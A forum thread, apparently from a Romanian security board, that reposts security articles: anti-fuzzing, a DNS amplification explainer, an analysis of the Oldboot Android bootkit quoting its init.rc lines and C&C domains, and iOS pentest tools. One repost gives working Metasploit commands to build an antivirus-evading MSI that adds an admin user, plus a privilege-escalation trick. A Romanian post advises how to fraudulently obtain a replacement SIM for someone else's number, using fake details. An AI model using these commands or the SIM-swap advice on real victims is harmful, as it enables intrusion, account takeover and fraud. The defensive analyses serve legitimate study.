maintainer of a popular speech recognition library, it may seem that I shot myself in the foot by exposing this. But I have no doubt that by exposing this, we can ensure that these issues will be resolved soon, and we can all go back to feeling very silly talking to our computers… A year from now, it will feel as natural as any of the other wonders of this age. Sursa: Chrome Bugs Lets Sites Listen to Your Private Conversations
  9. Introduction to Anti-Fuzzing: A Defence in Depth Aid Thursday January 2, 2014 tl;dr Anti-Fuzzing is a set of concepts and techniques that are designed to slowdown and frustrate threat actors looking to fuzz test software products by deliberately misbehaving, misdirecting, misinforming and otherwise hindering their efforts. The goal is to drive down the return of investment seen in fuzzing today by virtue of making it more expensive in terms of time and effort when used by malicious aggressors. History of Anti-Fuzzing Some of the original concepts that sit behind this post were conceived and developed by Aaron Adams and myself whilst at Research In Motion (BlackBerry) circa 2010. The history of Anti-Fuzzing is one of those fortunate accidents that sometimes occur. Whilst at BlackBerry we were looking to do some fuzzing of the legacy USB stack. For whatever reason the developers had added code that when the device encountered an unexpected value at a particular location in the USB protocol the device would deliberately catastrophically fail (catfail in RIM vernacular). This catfail would look to the uninitiated like the device had crashed and thus you would likely be inclined to investigate further to understand why. Ultimately you’d realise it was deliberate and then come to the conclusion that you had wasted time debugging the issue. After realising that wasting cycles in this manner could potentially be an effective and demoralising defensive technique to frustrate and hinder aggressors the concept of Anti-Fuzzing was born. Over the following years I fielded questions from at least three researchers who believed they may have found a security issue in the product’s USB stack when in fact they had simply tripped over the same intended behaviour. There is prior art in this space. Two industry luminaries in the guise of Haroon Meer and Roelof Temmingh in their seminal 2004 paper When the Tables Turn. In January 2013 a blog post titled Advanced Persistent Trolling by Francesco Manzoni discussed an Anti-Fuzzing concept specifically designed to frustrate penetration testers during web application assessments. This is obviously not something I condone but it introduced some similar techniques and concepts in the context of web applications specifically. Anti-Tamper: an Introduction Before we get onto Anti-Fuzzing first it’s worth understanding what Anti-Tamper is as it heavily influenced the early formation of the idea. In short Anti-Tamper is a US Department of Defence concept that is summarised (overview presentation) as follows: Anti-Tamper (AT) encompasses the systems engineering activities intended to prevent and/or delay exploitation of critical technologies in U.S. weapon systems. These activities involve the entire life-cycle of systems acquisition, including research, design, development, implementation, and testing of AT measures. Properly employed, AT will add longevity to a critical technology by deterring efforts to reverse-engineer, exploit, or develop countermeasures against a system or system component. AT is not intended to completely defeat such hostile attempts, but it should discourage exploitation or reverse-engineering or make such efforts so time-consuming, difficult, and expensive that even if successful, a critical technology will have been replaced by its next-generation version. These goals can equally apply to fuzzing. Anti-Fuzzing: a Summary If we take the Anti-Tamper mission statement and adjust the language for Anti-Fuzzing we arrive at something akin to: Anti-Fuzzing (AF) encompasses the systems engineering activities intended to prevent and/or delay fuzzing of software. Properly employed, AF will add longevity to the security of a technology by deterring efforts to fuzz and thus find vulnerabilities via this method against a system or system component. AF is not intended to completely defeat such hostile attempts, but it should discourage fuzzing or make such efforts so time-consuming, difficult, and expensive that even if successful, a critical technology will have been replaced by its next-generation version with improved mitigations. Now these are lofty goals for sure, but as you’ll see we can go some way as to meet them using a variety of different approaches. As with Anti-Tamper, Anti-Fuzzing is intended to: Deter: threat actor’s willingness or ability to fuzz effectively (i.e. have the aggressor pick an easier target). Detect: fuzzing and respond accordingly in a defensive manner. Prevent or degrade: the threat actor’s ability to succeed in their fuzzing mission. Articol complet: https://www.nccgroup.com/en/blog/2014/01/introduction-to-anti-fuzzing-a-defence-in-depth-aid/
  10. Bypassing Anti-Virus with Metasploit MSI Files 1/20/2014 | NetsPWN A while back I put together a short blog titled 10 Evil User Tricks for Bypassing Anti-Virus. The goal was to highlight common anti-virus misconfigurations. While I was chatting with Mark Beard he mentioned that I neglected to include how to use Metasploit payloads packaged in MSI files. So in this blog I'll try to make amends by providing a quick and dirty walkthrough of how to do that. This should be useful for both sysadmins and penetration testers. Creating MSI Files that Run Metasploit Payloads The Metasploit Framework team (and the greater security community) has made it easy and fun to package Metasploit payloads in almost any file format. Thankfully that includes MSI files. MSI files are Windows installation packages commonly used to deploy software via GPO and other methods. Luckily for penetration testers some anti-virus solutions aren't configured by default to scan .msi files or the .tmp files that are generated when MSI files are executed. For those of you who are interested in testing if your anti-virus solution stops Metasploit payloads packaged in .MSI files I worked with Mark to put together this short procedure. Use the msfconsole to create a MSI file that will execute a Metasploit payload. Feel free to choose your favorite payload, but I chose adduser because it makes for an easy test. Note: This payload requires local admin privileges to add the user. msfconsole use payload/windows/adduser set PASS Attacker123! set USER Attacker generate -t msi -f /tmp/evil.msi Alternatively, you can generate the MSI file with the msfvenom ruby script that comes with Metasploit: msfvenom -p windows/adduser USER=Attacker PASS=Attacker123! -f msi > evil.msi Copy the evil.msi file to the target system and run the MSI installation from the command line to execute the Metasploit payload. From a penetration test perspective using the /quiet switch is handy, because it suppresses messages that would normally be displayed to the user. msiexec /quiet /qn /I c:\temp\evil.msi Check anti-virus logs to see if the payload was identified. You can also check to see if the payload executed and added the "Attacker" user with the command below. If user information is returned then the payload executed successfully. net user attacker The MSI file is configured to execute the payload, but will not complete the formal installation process, because the authors (Ben Campbell and Parvez Anwar) forced it to fail using some invalid VBS. So uninstalling it won't be required after execution. However, during execution a randomly named .tmp file will be created that contains the MSF payload in the c:\windows\Installer\ folder. The file should be cleaned up automatically, but if the installation fails out for any reason the file will most likely need to be removed manually. The file will look something like "c:\windows\Installer\MSI5D2F.tmp". As a side note, it appears that the .tmp file is basically a renamed .exe file. So if you manually rename the .tmp file to an .exe file you can execute it directly. Also, once it's renamed to an .exe file anti-virus starts to pick it up. Escalating Privileges with MSI Packages As it turns out MSI files are handy for more than simply avoiding anti-virus. Parvez Anwar figured out that they can also be used to escalate privileges from local user to local administrator if the group policy setting "Always install with elevated privileges" is enabled for the computer and user configurations. The setting is exactly what it sounds like. It provides users with the ability to install any horrible ad-ware, pron-ware, or malware they want onto corporate systems. In gpedit.msc the configuration looks something like this: The policies can also be viewed or modified from the following registry locations: [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] "AlwaysInstallElevated"=dword:00000001 For those of you who don't want to go through hassle of generating and executing the MSI files manually Ben Campell (meatballs) and Parvez Anwar were nice enough to put together a Metasploit module to do it for you called "Windows AlwaysInstallElevated MSI". The technique was also mentioned during a recent presentation by Rob Fuller (mubix) and Chris Gates (carnal0wnage) titled "AT is the new BLACK" which is worth checking out. Wrap Up The down side is that MSI files can pose a serious threat if anti-virus and group policy settings are not configured securely. However, the bright side is it's an easy problem to fix in most environments. Good hunting, and don't forget to Hack Responsibly! References Windows Installer Package http://msdn.microsoft.com/en-us/library/aa244642(v=vs.60).aspx Advanced Installer - Download rewt dance: Metasploit MSI Payload Generation Abusing MSI’s elevated privileges | GreyHatHacker.NET Sursa: https://www.netspi.com/blog/entryid/212/bypassing-anti-virus-with-metasploit-msi-files
  11. Nytro

    gidb

    gidb gidb is a tool to simplify some common tasks for iOS pentesting and research. It is still a work in progress but already provides a bunch of (hopefully) useful commands. The goal was to provide all (or most) functionality for both, iDevices and the iOS simulator. For this, a lot is abstracted internally to make it work transparently for both environments. Although recently the focus has been more on suporting devices. idb was released as part of a talk at ShmooCon 2014. The slides of the talk are up on Speakerdeck. There is also a blog post on my personal website that I will update with the video of the talk once it is available. Getting Started Visit the getting started guide on the wiki. Bug reports, feature requests, and contributions are more than welcome! Command-Line Version idb started out as a command line tool which is still accesible through the cli branch. Find the getting started guid and some more documentation in the wiki. gidb Features Simplified pentesting setup Setup port forwarding Certificate management [*]iOS log viewer [*]Screen shot utility Simplifies testing for the creation of backgrounding screenshots [*]App-related functions App binary Download List imported libraries Check for encrypttion, ASLR, stack canaries Decrypt and download an app binary (requires dumpdecrypted) [*]Launch an app [*]View app details such as name, bundleid, and Info.plist file. [*]Inter-Process Communication URL Handlers List URL handlers Invoke and fuzz URL handlers [*]Pasteboard monitor [*]Analyze local file storage Search for, download, and view plist files Search for, download, and view sqlite databases Search for, download, and view local caches (Cache.db) File system browser [*]Install utilities on iDevices Ii Install iOS SSL killswitch alpha: Compile and install dumpdecrypted [*]Alpha: Cycript console Snoop-It integration Sursa: https://github.com/dmayer/idb
  12. Anatomy of a DNS DDoS Amplification Attack by David Piscitello, ICANN SSAC Fellow Over the past several months, a series of Distributed Denial of Service (DDoS) attacks victimized DNS root and Top Level Domain (TLD) name server operators. These attacks merit careful analysis because they combine several attack tools and methods to increase their effectiveness. The attacks also call attention to an operational problem that was solved long ago; yet most IT administrators have not adopted the answer. The attacker's toolkit The attacks observed against root and TLD name servers are variants of a DNS amplification attack and use the following tools: System compromise. An attacker doesn't want to use his own system to attack other systems and risk discovery, so he launches the attack from systems on which he has gained unauthorized administrative control. There are many ways to gain control of systems. One method uses a mass email worm to infect a large number of systems. When the worm infects a system, it installs a remote software agent, or zombie,that the attacker can remotely control and direct to initiate a DoS attack. Distributing the DoS attack sources. In the attacks observed, the attacker's goal is to saturate the targeted name server operator's communications infrastructure rather than the name servers themselves. Name server operators typically have large access circuits, so launching an attack from a single source is unlikely to accomplish this goal. But by amassing a veritable army of attack sources the attacker can fill even Gigabit per second access circuits. Botnets, a collection of zombie hosts the attacker "owns," commonly serve as the attacker's army. Amplification. Attackers use amplification to increase the traffic volume in an attack. In the DNS attacks, the attacker uses an extension to the DNS protocol (EDNS0) that enables large DNS messages. The attacker composes a DNS request message of approximately 60 bytes to trigger delivery of a response message of approximately 4000 bytes to the target. The resulting amplification factor, approximately 70:1, significantly increases the volume of traffic the target receives, accelerating the rate at which the target's resources will be depleted. DNS data corruption. To achieve the amplification effect, the attacker issues a DNS request that he knows will evoke a very large response. There are many ways for the attacker to know which DNS resource record to request in advance. For this article, we'll choose one and assume that the attacker has previously compromised a poorly configured name server and has modified this server's zone file to include a DNS TXT resource record of approximately 4000 bytes to serve as the amplification resource record. Impersonation. In the DNS attacks, each attacking host uses the targeted name server's IP address as its source IP address rather than its own. The effect of spoofing IP addresses in this manner is that responses to DNS requests will be returned to the target rather than the spoofing hosts. Exploitable name service operation. The DNS attacks exploit name servers that allow open recursion. Recursion is a method of processing a DNS request in which a name server performs the request for a client by asking the authoritative name server for the name record. Recursion is not inherently bad; however, recursion should only be provided for a trusted set of clients. Name servers that perform (open) recursion for any host provide attackers with an easily exploitable vector. The Attack Now that you are familiar with the attack elements, let's look at how the attack is performed. The attacker recruits his army of attack sources (the botnet). He writes the large amplification record (e.g., a 4000 byte DNS TXT resource record) in the zone file of the name server he has compromised. He tests for and compiles a list of open recursive name servers that will query the compromised name server on behalf of the spoofing hosts. (More than one million insecurely configured name servers worldwide provide open recursion, so this is quite an easy list to compile.) With these elements in place, the attacker commands his army to attack a targeted name server via the open recursive servers. Suppose the attacker targets a name server at the IP address 10.10.1.1. At the attacker's signal, all the zombies in his botnet issue DNS request messages asking for the amplification record through open recursive servers (see diagram). The botnet hosts spoof the targeted name server by writing 10.10.1.1 in the source IP address field of the IP packets containing their DNS request messages. The open recursive name servers accept the DNS request messages from the botnet hosts. If the open recursive name servers have not received a request for this record before, and do not already hold the amplification record in their cache, they issue a DNS request message of their own to the compromised name server to retrieve it, and the compromised name server returns the amplification record to the open recursive servers. The open recursive servers compose DNS response messages containing the amplification record and return these to the systems that originated the request. The open recursive servers believe they are sending DNS response messages to the botnet hosts that made the initial query, when in fact IP spoofing causes the responses to be forwarded to the target name server at 10.10.1.1. The targeted name server at 10.10.1.1 never issued any DNS request messages but is now bombarded with responses. The responses contain a 4000 byte DNS TXT record. A message of this size exceeds the maximum (Ethernet) transmission unit, so it is broken into multiple IP packet fragments. This forces reassembly at the destination, which increases the processing load at the target and enhances the deception: because the response spans several IP fragments, and only the first fragment contains the UDP header, the target may not immediately recognize that the attack is DNS-based. This DDoS attack is most effective when launched via a large number of open recursive servers. Distribution increases the traffic and decreases the focus on the sources of the attack . The impact on the misused open recursive servers is generally low, so generally goes undetected. The effect on the target, however, can be severe. Attacks based on this method have achieved a bandwidth consumption rate exceeding seven (7) Gigabits per second. Surviving (if you are the target) There are several measures you can take to diminish the effects of this DDoS attack. The source IP addresses are not spoofed in the IP packets carrying the DNS response messages, so the source addresses identify the open recursive servers the zombies use. Depending on the severity of the attack and how strongly you wish to respond, you can rate-limit traffic from these source IP addresses or use a filtering rule that drops DNS response messages that are suspiciously large (over 512 bytes). In the extreme, you may choose to block traffic from the open recursive servers entirely. These efforts do not squelch the attack sources, and they do not reduce the load on networks and switches between your name server and the open recursive servers. Note that if you block all traffic from these open recursive servers you may interfere with legitimate attempts to resolve names through these servers; for example, some organizations run open recursive servers so that mobile employees can resolve from a "trusted" name server, so such users can be affected. What can you do to reduce the threat? We know the tools attackers use, so we need to prevent him from assembling his toolkit. Two countermeasures are obvious. Securely configure client systems and use antivirus protection so that the attacker is unable to recruit his botnet army. Securely configure name servers to reduce the attacker's ability to corrupt a zone file with the amplification record. Disable open recursion on your name servers and only accept recursive DNS from trusted sources. This measure will greatly reduce the attack vectors. It is a relatively simple configuration change on common DNS application services such as Windows 2003 Server and BIND. If you are using an external DNS name server, test to see if it is offering open recursion. Contact your ISP or DNS provider and suggest he close this security loophole if open. Even when used in combination, these measures cannot have the same mitigating effect as source IP address validation. By performing source IP address validation, you can effectively prevent the impersonation attack: the botnet hosts can't generate DNS request messages posing as the targeted name server, which stems the attack at the outset. If you run an Internet firewall or a router that supports access control lists, modify your egress traffic filtering policy to only allow IP packets to exit your network if they contain source IP addresses assigned from the subnets you use internally. Source IP address validation is not widely implemented, despite repeated encouragement to do so by security experts and advisory groups such as SANS, CERT, and ICANN's Security and Stability Advisory Committee (SSAC). Critics of source IP address validation claim that implementation adds administrative overhead and adversely impacts performance. Sustained DDoS attacks against root and TLD name servers have potentially graver consequences, and the frequency and effectiveness of DDoS attacks is only increasing while we continue to ignore this much-needed security measure. Telecommunications networks have been validating telephone numbers and addresses on ingress traffic for decades. It's time for IP networks do the same. ## Sursa: Anatomy of a DNS DDoS Amplification Attack | WatchGuard
  13. [h=1]Oldboot: the first bootkit on Android[/h]Zihang Xiao Qihoo 360 Technology Co. Ltd. (NYSE: QIHU) Zihang Xiao, Qing Dong, Hao Zhang and Xuxian Jiang Jan 17, 2014 —— A few days ago, we found an Android Trojan using brand new method to modify devices’ boot partition and booting script file to launch system service and extract malicious application during the early stage of system’s booting. Due to the special RAM disk feature of Android devices’ boot partition, all current mobile antivirus product in the world can’t completely remove this Trojan or effectively repair the system. We named this Android Trojan family as Oldboot. As far as we know, this’s the first bootkit found on Android platform in the wild. According to our statistics, as of today, there’re more than 500, 000 Android devices infected by this bootkit in China in last six months. We’ve released a new security tool (download) which can accurately detect and defines it. [h=2]Construction and behaviors of Oldboot[/h] While an Android device be infected by Oldboot, its user will find some new applications which contain lots of advertisement frequently being installed to the system. In the installed applications list, the user will find a system application named GoogleKernel which can’t be uninstalled manually. Antivirus products, such as 360 Mobile Security, will classify this application as malware (Figure 1). However, after removing it and rebooting the device, the two previous phenomenon will occur again. Oldboot is constituted by four executable or configuration files: /init.rc, the configuration script for Android system’s booting which has been modified by Oldboot /sbin/imei_chk, an ELF executable file for ARM architecture /system/app/GoogleKernel.apk, an Android application which is installed as system application /system/lib/libgooglekernel.so, the native library used by the GoogleKernel Figure 1 Antivirus product classify the GoogleKernel as a malware These four files have complex calling relationship (Figure 2): When Android system is booting, it will read the init.rc, launch the imei_chk as system service and open related local socket; The imei_chk will then extract the libgooglekernel.so into /system/lib; The imei_chk will also extract the GoogleKernel.apk into /system/app; After system’s booting finished, the GoogleKernel.apk was installed as system application. It will periodically execute native code in the libgooglekernel.so to trigger malicious behaviors; The libgooglekernel.so will generate configurations or malicious commands, and pass them to Java code in the GoogleKernel.apk; The GoogleKernel.apk sends commands to the imei_chk through socket. These commands will be executed by the imei_chk at last. Figure 2 Components of Oldboot and their relationship Below is more detailed analysis to these files. At the tail of the init.rc’s content, we found these lines: service imei_chk /sbin/imei_chk class core socket imei_chk stream 666 According to this, when Android system’s booting, the init process will launch a new system service named imei_chk with root permission, and will create a local socket with the same name. Before creating socket and listening, the imei_chk will execute some code which read two data blocks from its read-only data segment and then extract them to these two files (Figure 3): /system/lib/libgooglekernel.so /system/app/GoogleKernel.apk Figure 3 The imei_chk extracts so and APK files On the other side, the imei_chk will create a socket to receive all coming data. These data will be parsed to Linux system commands which will be executed with root permission at last (Figure 4). Figure 4 The imei_chk receives commands and executes them In the infected device, we found the imei_chk socket is running with root permission and is listening to receive data from any other process. Please note that the access property of this socket device is 666 with the setuid flag (Figure 5). This world-writable property will lead to a serious security vulnerability: In the infected devices, any other applications can send this socket device some Linux commands which will be executed with root permission later. Figure 5 The imei_chk socket device can be written by any process When Android system is booting, it will check whether all APK files under /system/app are installed. If not, it will installed them as system applications (or so called pre-installed applications). Thus, the GoogleKernel.apk will be installed as system application, while the libgooglekernel.so, its reliant native library, has been extracted to correct place. When removing normal Android malware, all previous Android antivirus products will only uninstall and delete malicious APK and so files. Thus, when the device rebooting, the undeleted imei_chk will extract GoogleKernel.apk again. In fact, these antivirus product not only won’t, but also can’t effectively remove the imei_chk. We’ll discuss on this later. Let’s have a deeper look into the GoogleKernel.apk. It declares many system or dangerous level permissions in the AndroidManifest.xml, and specifies itself running by the system user: <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" /> <uses-permission android:name="android.permission.INSTALL_PACKAGES" /> <uses-permission android:name="android.permission.DELETE_PACKAGES" /> <uses-permission android:name="android.permission.CLEAR_APP_USER_DATA" /> <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> …… <application android:allowBackup="true" android:allowClearUserData="false" android:killAfterRestore="false" android:label="GoogleKernel" android:persistent="true" android:process="system"> The application has only one service named Dalvik and two receivers named BootRecv and EventsRecv, without any activity as well as user interface. Its main behaviors include collecting system information, changing network settings, and periodically triggering other malicious behaviors such as: Connecting to its C&C Server (Figure 6) to download configuration file; Connecting to its C&C Server to get back system commands, and executing with root permission; Downloading APK files (Figure 7) and installing as system applications (Figure 8) Uninstalling specified system applications. From some unfinished functions’ name, it seems that the author of Oldboot was planning to implement sending SMS to any specified phone number (Figure 9). Figure 6 The libgooglekernel.so stores C&C servers’ URL to its global config Figure 7 The libgooglekernel.so downloads APK files and install them Figure 8 The downloaded APK files are installed as system applications Figure 9 The libgooglekernel.so tries to send SMS, but related Java code isn’t finished The author of Oldboot intentionally designed malicious behaviors’ implementation. All main malicious behaviors are split to many different execute phases which are implemented in different components: The GoogleKernel.apk will periodically activate itself to call JNI interfaces of the so file to trigger malicious behaviors (Phase 1). If the behavior is to connect with C&C servers, the so file will construct servers’ URLs and call Java code in the APK file through JNI again (Phase 2). The APK file will start HTTP connection to servers and return request result to the so file (Phase 3). The so file then parses result’s format to get commands, configuration or data (Phase 4). If the behavior is to install APK files, or to uninstall system application, after downloading APK files through the above phases, the so file will construct system commands (including remount the system partition and pm install/uninstall) for installation or uninstallation and pass them to the APK file through JNI (Phase 5). The APK file will send these commands to the imei_chk service through local socket (Phase 6, see Figure 10 and Figure 11). At last, the imei_chk will execute these commands with root permission (Phase 7). Figure 10 The GoogleKernel.apk initializes connection with local socket imei_chk Figure 11 The GoogleKernel.apk send system commands to the socket [h=2]New infection methods[/h] Differ from previous malware on Android, the main specialty of Oldboot is its modification to the init.rc file and the /sbin directory. In Android, the root directory and the /sbin directory locate in the RAM disk which is loaded from the boot partition of device’s disk. This RAM disk is a read-only in-memory file system. And any runtime changing on it will never be physically written back to the disk. Thus, during system’s running, even we remount the partition to writeable, and delete some files in these directories, the deleting operations won’t really apply to the disk. After the device rebooting, these files will appear again. Previous Android malware, such as DroidKungfu, may extract malicious files to the /system partition. But the /system partition doesn’t have the above feature, which means, there’s no any technical difficult on both malware’s file writing and antivirus’ file deleting. However, when facing Oldboot, even the antivirus products know the imei_chk is a malicious which need to be deleted, they can’t really completely delete it by previous traditional method since this “remount” method will only delete the copy of /sbin/imei_chk in memory but won’t affect the disk partition. The problem is, how the attacker put the imei_chk into /sbin directory and successfully modified the init.rc script? We believe there’re at least two ways to achieve it: The attacker has a chance to physically touch the devices, and flash a malcious boot.img image files to the boot partition of the disk; During system’s running, after gaining root permission, forcibly write malicious files into boot partition through the dd utility. In Oldboot’s case, we’re more likely to believe that the attacker chose the first way (But we still can’t exclude possibility of the second one). Here’re reasons: Firstly, we found the infected device is bought from a big IT mall in Zhongguancun, which is a famous and the biggest consumer electronics distributing center in Beijing. In the past, we’ve found some retailers here flashing system images which contain malware into mobile phone or tablet them selling. Secondly, the infected device (the Galaxy Note II) contains Samsung’s stock system; all normal system applications in it has Samsung’s official signature. However, the recovery partition has been replaced by a third-party recovery ROM, and the timestamp of all files in the boot partition are the same (2013-05-08 17:22). Thirdly, based on Qihoo’s cloud security technology, we counted models of all known infected devices. More than half of them are not well-known popular models. If the attacker used the second way to infect devices remotely, the attack targets will be randomly and out of control which should be distributed more close to the real market distribution of Android devices. [h=2]Related samples[/h] The APK file extracted by Oldboot uses a self-signed certification. We found two other malware used the same certification. The first malware disguises as normal security application. It will dynamically register a ContentObserver to observe any changes of the SMS inbox. Every time a new SMS is coming, it will check if its content contains words such as “QQ number” or “password” in Chinese (Figure 12). If these words exist, it will delete this SMS, and upload the content to some specified severs. In the past, the Tencent provided service to recover QQ password through SMS. Thus, this malware can steal user’s QQ account at that time. The malware also uses receivers and service with the same name as in Oldboot’s APK file. Figure 12 The Oldboot’s related sample will steal QQ’s password The second related malware was named GoogleDalvik. Its code structures, including JNI interfaces and entry classes, are almostly the same as Oldboot,. The only difference between the GoogleDalvik and GoogleKernel.apk is, the previous doesn’t communicate with the imei_chk through socket. For installation or uninstallation system application, it just execute commands in its Java code (Figure 13). Figure 13 The Only difference between Oldboot and its previous version We believe, the GoogleDalvik is an earlier version of Oldboot, a version without bootkit component. The GoogleDalvik and Oldboot all use domains such as androld666.com and androld999.com as their C&C servers’ URL, this is the main reason we named this family as Oldboot. [h=2]Solutions[/h] Now, we’ve released the first special security tool for Oldboot. You can download it from: http://msoftdl.360.cn/mobilesafe/shouji360/360safesis/OldbootKiller_20140117.apk This tool will deeply and precisely scan Android devices to find the existence of Oldboot and its variants. We’ve developed a new defines method in it which can effectively disable all malicious behaviours of Oldboot. Besides of using our security tool to detect and defines it, we also suggest the users: Checking this tool’s updating regularly. We may add more ability to detect or clean its further variants. If it finds Oldboot on your phone, please report your phone’s information and the samples to us. This will help us a lot. You can also try to re-flash your device with its origin stock ROM. After flashing, the Oldboot should be completely removed. Since only modified devices will infect Oldboot, if you’ve find it by our tool, you can also directly contact with your reseller to take customer service. We also suggest you to install the 360 Mobile Security application and using its cloud detection ability to protect your mobile phone and tablet. [h=2]Discussion[/h] Before we found Oldboot, the most famous Android malware which is widely considered as rootkit is a variant of the DroidKungfu family. It gains root permission by system vulnerabilities, remounts system partition, replaces some executable files in it, and rewrites system configuration files. It also tries to run malicious code in the early stage of system’s booting to prevent be cleaned by antivirus applications. However, there’re many differences between DroidKungfu and Oldboot. Firstly, Oldboot’s infection method isn’t simply remounting system partition and changing files like DroidKungfu, but physically operating device’s disk (through flash or dd). Secondly, Oldboot can’t been removed or repaired in the file system level, but DroidKungfu can be. At last, this attack method, which exploits boot partition’s RAM disk feature, can be easily developed to implement more advanced file system level hidden. We believe Oldboot creates a totally new malware attack method on Android. Through physically touch or disk level operation, the further Android malware can similarly write themselves to the boot partition and modify the init.rc script to gain very earlier launch priority with high running permission to avoid being cleaned by antivirus solutions, as well as to effectively hide themselves. As the first found bootkit on Android, the Oldboot has symbolic significance. We will closely follow further development of this kind of attack. —— (media contacts: xiaozihang@360.cn) Sursa: Oldboot: the first bootkit on Android | 360????
  14. [h=1]iOS SSL Kill Switch[/h] Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS Apps. [h=2]Description[/h] Once installed on a jailbroken device, iOS SSL Kill Switch patches low-level SSL functions within the Secure Transport API, including SSLSetSessionOption() and SSLHandshake() in order to override and disable the system's default certificate validation as well as any kind of custom certificate validation (such as certificate pinning). It was successfully tested against the Twitter, Facebook, Square and Apple App Store apps; all of them implement certificate pinning. iOS SSL Kill Switch was initially released at Black Hat Vegas 2012. For more technical details on how it works, see iOS SSL Kill Switch v0.5 Released | In Security [h=2]Installation[/h] Users should first download the latest pre-compiled Debian package available in the release section of the project page at: https://github.com/iSECPartners/ios-ssl-kill-switch/releases The tool was tested on iOS7 running on an iPhone 5S. [h=3]Dependencies[/h] iOS SSL Kill Switch will only run on a jailbroken device. Using Cydia, make sure the following packages are installed: dpkg MobileSubstrate PreferenceLoader Sursa: https://github.com/iSECPartners/ios-ssl-kill-switch
  15. Boot-Repair-Disk, the 'must-have' rescue CD ! Here is THE Rescue Disk that you should keep close to your computer ! runs automatically Boot-Repair rescue tool at start-up also contains the OS-Uninstaller tool. repairs recent (UEFI) computers as well as old PCs HOW TO GET AND USE THE DISK: (1) DOWNLOAD BOOT-REPAIR-DISK, (2) Then burn it on CD or put it on USB key via Unetbootin, (3) Insert the Boot-Repair-Disk and reboot the PC, (4) Choose your language, (5) Connect internet if possible (6) Click "Recommended repair" (7) Reboot the pc --> solves the majority of bootsector/GRUB/MBR problems GET HELP: by Email (boot.repair ATT gmail DOT com) HELP THE PROJECT: Translate, or Donate (Paypal account boot.repair@gmail.com) Sursa: boot-repair-disk / Home / Home
  16. Da, exact la asta ma gandeam si eu cand mi se stricase cartela. Ca sa para mai "real" puteti lua o cartela de Orange, o zgariati incat sa nu mai mearga si ii puneti sa o schimbe. Dar cred ca varianta mai ok e cea cu pierdutul telefonului deoarece in acest caz "altcineva poate folosi cartela intre timp". PS: Nu va bazati pe asta. Cel putin la Orange, cand iti schimba cartela, TE OBLIGA jegosii sa iti faci un abonament pe 3 luni (sau mai mult) si ai nevoie de buletin pentru asta. Cu alte cuvinte, daca adevaratul posesor vine si se plange s-ar putea sa afle cine i-a facut asta. Incercati si voi sa scapati fara buletin, sa dati niste date fictive. Bine, cu datele astea "fictive" cred ca puteti ajunge la "fals in acte" si puteti avea probleme legale, ganditi-va daca se merita.
  17. Rapid Object Detection in .NET By Huseyin Atasoy, 25 Jan 2014 Introduction The most popular and the fastest implementation of Viola-Jones object detection algorithm is undoubtedly the implementation of OpenCV. But OpenCV requires wrapper classes to be usable with .NET languages and Bitmap objects of .NET have to be converted to IplImage format before it is used with OpenCV. On the other hand, programs that use OpenCV are dependent on all OpenCV libraries and their wrappers. These are not problems when functions of OpenCV are used. But if we need only to detect objects on a Bitmap, it isn't worth to make our programs dependent on all OpenCV libraries and wrappers... I have written a library (HaarCascadeClassifier.dll) that makes object detection possible in .NET without any other library requirement. It is an Open Source project that contains implementation of the Viola-Jones object detection algorithm. The library uses haar cascades generated by OpenCV (XML files) to detect particular objects such as faces. It can be used for object detection purposes or only to understand the algorithm and how parameters affect the result or the speed. Background In fact, my purpose is to share HaarCascadeClassifier.dll and its usage. So I will try to summarize the algorithm. Algorithm of Viola and Jones doesn't use pixels directly to detect objects. It uses rectangular features that are called "haar-like features". These features can be represented using 2, 3, or 4 rectangles. Articol: http://www.codeproject.com/Articles/436521/Rapid-Object-Detection-in-NET
  18. [h=3]Today’s outage for several Google services[/h]Earlier today, most Google users who use logged-in services like Gmail, Google+, Calendar and Documents found they were unable to access those services for approximately 25 minutes. For about 10 percent of users, the problem persisted for as much as 30 minutes longer. Whether the effect was brief or lasted the better part of an hour, please accept our apologies—we strive to make all of Google’s services available and fast for you, all the time, and we missed the mark today. The issue has been resolved, and we’re now focused on correcting the bug that caused the outage, as well as putting more checks and monitors in place to ensure that this kind of problem doesn’t happen again. If you’re interested in the technical explanation for what occurred and how it was fixed, read on. At 10:55 a.m. PST this morning, an internal system that generates configurations—essentially, information that tells other systems how to behave—encountered a software bug and generated an incorrect configuration. The incorrect configuration was sent to live services over the next 15 minutes, caused users’ requests for their data to be ignored, and those services, in turn, generated errors. Users began seeing these errors on affected services at 11:02 a.m., and at that time our internal monitoring alerted Google’s Site Reliability Team. Engineers were still debugging 12 minutes later when the same system, having automatically cleared the original error, generated a new correct configuration at 11:14 a.m. and began sending it; errors subsided rapidly starting at this time. By 11:30 a.m. the correct configuration was live everywhere and almost all users’ service was restored. With services once again working normally, our work is now focused on (a) removing the source of failure that caused today’s outage, and ( speeding up recovery when a problem does occur. We'll be taking the following steps in the next few days: 1. Correcting the bug in the configuration generator to prevent recurrence, and auditing all other critical configuration generation systems to ensure they do not contain a similar bug. 2. Adding additional input validation checks for configurations, so that a bad configuration generated in the future will not result in service disruption. 3. Adding additional targeted monitoring to more quickly detect and diagnose the cause of service failure. Posted by Ben Treynor, VP Engineering Sursa: Official Blog: Today’s outage for several Google services
  19. [h=1]Compiling C# Code at Runtime[/h]By Lumír L? Kojecký, 25 Jan 2014 [h=2]Introduction[/h] Sometimes, it is very useful to compile code at runtime. Personally, I use this feature mostly in these two cases: Simple web tutorials – writing a small piece of code into TextBox control and its execution instead of the necessity to own or to run some IDE. User-defined functions – I have written an application for symbolic regression with simple configuration file where user can choose some of my predefined functions (sin, cos, etc.). The user can also simply write his own mathematical expression with basic knowledge of C# language. If you want to use this feature, you don’t have to install any third-party libraries. All functionality is provided by the .NET Framework in Microsoft.CSharp and System.CodeCom.Compiler namespaces. Articol: http://www.codeproject.com/Tips/715891/Compiling-Csharp-Code-at-Runtime
